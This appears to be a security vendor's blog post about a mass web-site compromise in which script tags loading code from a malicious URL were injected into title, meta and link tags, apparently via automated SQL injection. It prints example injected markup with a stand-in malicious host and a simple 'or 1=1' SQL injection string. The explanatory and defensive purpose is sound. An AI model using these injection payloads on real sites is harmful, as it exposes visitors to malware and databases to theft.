Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.
F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.
The infection code was a <script > tag that pointed to a malicious URL. The new discovery here is that these malicious tags were inserted between the usual text tags <title > </title >. For example
<title >My Website <script src=http://maliciousURL.com > </script > </title >
and into <meta >, <a href= > <div class=”myclass” > etc. like for example <a href=http://goodURL <script src=http://maliciousURL > </script > >.
An infected Web site would display its infection in the browser window title:
While neither <title > nor <meta > tags are supposed to support <script >, some browsers are prone to syntax errors. They interpret any script tags wherever they are placed.
The visitors of the affected Web sites are thus exposed to threats active on their systems.
The massive infection of Web sites was done supposedly through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it would not be the last time either.
What’s notable about SQL injections is that such attacks can be triggered any time, regardless of the security patch of the SQL server behind. The success of the attack depends on the Web application that uses SQL servers. A Web site with no field content control is pretty easy to fool into sending to the server a simple SQL command. To simplify:
“SELECT * FROM bank_data WHERE Userid=blah or 1=1”
The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or from inexperienced developers that may not consider field content checking.
Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.
Share this article